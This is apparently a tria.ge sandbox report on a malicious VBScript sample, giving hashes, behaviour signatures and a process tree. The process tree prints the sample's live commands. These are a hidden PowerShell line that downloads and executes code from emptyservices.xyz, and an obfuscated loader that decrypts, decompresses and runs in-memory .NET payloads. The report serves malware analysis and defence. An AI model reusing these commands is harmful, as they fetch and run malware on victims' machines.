Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03/12/2024, 18:10
Static task
static1
Behavioral task
behavioral1
Sample
6400_output.vbs
Resource
win7-20240903-en
General
-
Target
6400_output.vbs
-
Size
49KB
-
MD5
50e3a17992c509fd34daf21f3d408733
-
SHA1
99001c7b061914c9caaf7ef2ba75f25ac3498d82
-
SHA256
bb11c0b847be578c727bd146e232a82eb65b8c43ad1657b200e12416b5fb3e3b
-
SHA512
e21c89778aecaa7a532f5d953a87b6ed575a14788556b67b3311ffec188d492bd633773ee81879c1451cf6ed1ad4c189bf41f07fc8dbba72bd07103a53597849
-
SSDEEP
768:I+1zXj3HDb1sybJRpN9/NVAdEamHuaxBsgV29+DY9lYUP7bFQqrSwli:IIzTzL/vtNV/RHvM5ADeHFn0
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2652 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2684 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2652 powershell.exe 2684 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 2684 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2980 wrote to memory of 2652 2980 WScript.exe 30 PID 2980 wrote to memory of 2652 2980 WScript.exe 30 PID 2980 wrote to memory of 2652 2980 WScript.exe 30 PID 2980 wrote to memory of 2964 2980 WScript.exe 32 PID 2980 wrote to memory of 2964 2980 WScript.exe 32 PID 2980 wrote to memory of 2964 2980 WScript.exe 32 PID 2964 wrote to memory of 2524 2964 cmd.exe 34 PID 2964 wrote to memory of 2524 2964 cmd.exe 34 PID 2964 wrote to memory of 2524 2964 cmd.exe 34 PID 2524 wrote to memory of 2496 2524 cmd.exe 36 PID 2524 wrote to memory of 2496 2524 cmd.exe 36 PID 2524 wrote to memory of 2496 2524 cmd.exe 36 PID 2524 wrote to memory of 2684 2524 cmd.exe 37 PID 2524 wrote to memory of 2684 2524 cmd.exe 37 PID 2524 wrote to memory of 2684 2524 cmd.exe 37 PID 2524 wrote to memory of 2684 2524 cmd.exe 37
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6400_output.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$UlQe='CrSJrjeaSJrjteSJrjDSJrjecSJrjrypSJrjtSJrjorSJrj'.Replace('SJrj', ''),'FrduLGoduLGmBduLGasduLGe64duLGSduLGtduLGrduLGinduLGgduLG'.Replace('duLG', ''),'SplWEtyitWEty'.Replace('WEty', ''),'TrPLLOaPLLOnPLLOsfPLLOorPLLOmFPLLOinaPLLOlPLLOBloPLLOckPLLO'.Replace('PLLO', ''),'IqAvznvqAvzokqAvzeqAvz'.Replace('qAvz', ''),'ElCRJaeCRJamCRJaeCRJantCRJaAtCRJa'.Replace('CRJa', ''),'CopoKbTyToKbTooKbT'.Replace('oKbT', ''),'CNvoBhaNvoBnNvoBgNvoBeENvoBxNvoBteNvoBnsiNvoBonNvoB'.Replace('NvoB', ''),'DVBxQecoVBxQmVBxQprVBxQeVBxQssVBxQ'.Replace('VBxQ', ''),'GFWFdetFWFdCuFWFdrFWFdreFWFdntFWFdPFWFdrocFWFdessFWFd'.Replace('FWFd', ''),'MaJpEGinJpEGMoJpEGdJpEGuJpEGleJpEG'.Replace('JpEG', ''),'ReaMYpLdMYpLLiMYpLneMYpLsMYpL'.Replace('MYpL', ''),'LoHeytadHeyt'.Replace('Heyt', ''),'EntGbxPrGbxPyGbxPPGbxPoiGbxPntGbxP'.Replace('GbxP', '');powershell -w hidden;function qnnlg($BQRjz){$vhoqP=[System.Security.Cryptography.Aes]::Create();$vhoqP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vhoqP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vhoqP.Key=[System.Convert]::($UlQe[1])('PqF8xJ4DsUvA734I68CUFeZUlzBwmh524HQ2zwVtwU0=');$vhoqP.IV=[System.Convert]::($UlQe[1])('ZAXbNfl672AbdKJrN/GTPw==');$txLMz=$vhoqP.($UlQe[0])();$WcLWs=$txLMz.($UlQe[3])($BQRjz,0,$BQRjz.Length);$txLMz.Dispose();$vhoqP.Dispose();$WcLWs;}function cedax($BQRjz){$surik=New-Object System.IO.MemoryStream(,$BQRjz);$atgID=New-Object System.IO.MemoryStream;$stzGr=New-Object System.IO.Compression.GZipStream($surik,[IO.Compression.CompressionMode]::($UlQe[8]));$stzGr.($UlQe[6])($atgID);$stzGr.Dispose();$surik.Dispose();$atgID.Dispose();$atgID.ToArray();}$UdUcO=[System.IO.File]::($UlQe[11])([Console]::Title);$lgana=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 5).Substring(2))));$RDaZu=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 6).Substring(2))));[System.Reflection.Assembly]::($UlQe[12])([byte[]]$RDaZu).($UlQe[13]).($UlQe[4])($null,$null);[System.Reflection.Assembly]::($UlQe[12])([byte[]]$lgana).($UlQe[13]).($UlQe[4])($null,$null); "4⤵PID:2496
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
48KB
MD583fba8b8c150fdd949067fc54f597aa1
SHA1fc6e442dba604453db6988950a09cd539c5f2ec8
SHA2567f5beae0e19c0836c3f6838dacbebab8a8811643156f1af13664ff4725989f25
SHA51211c852bb8d36a9e42beb5d42b3120bcec309ff751e60f750b8d35383b546285fd999450a13c238074228b8170d6efd16f238ec2c583964ee8393df23a201c1dd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IKSWF4055Z67QHXXRMF5.temp
Filesize7KB
MD5b3ec6a40120b04811740a611f2e68b85
SHA1339cbbea669b49e23bf5c1840314d76980f1ae8d
SHA256dde4e5bd545788140157bfd726a5210f9f58f0733ff63dc0f1ac32684c2bb5e5
SHA512d20d735b39b7afa9cda6667c2ab8470888c0e22162f1d01f050a315fabb4e93dc7d62bb18864c29290454660eb6b01930553339f1e141cfc775dc07aea725b26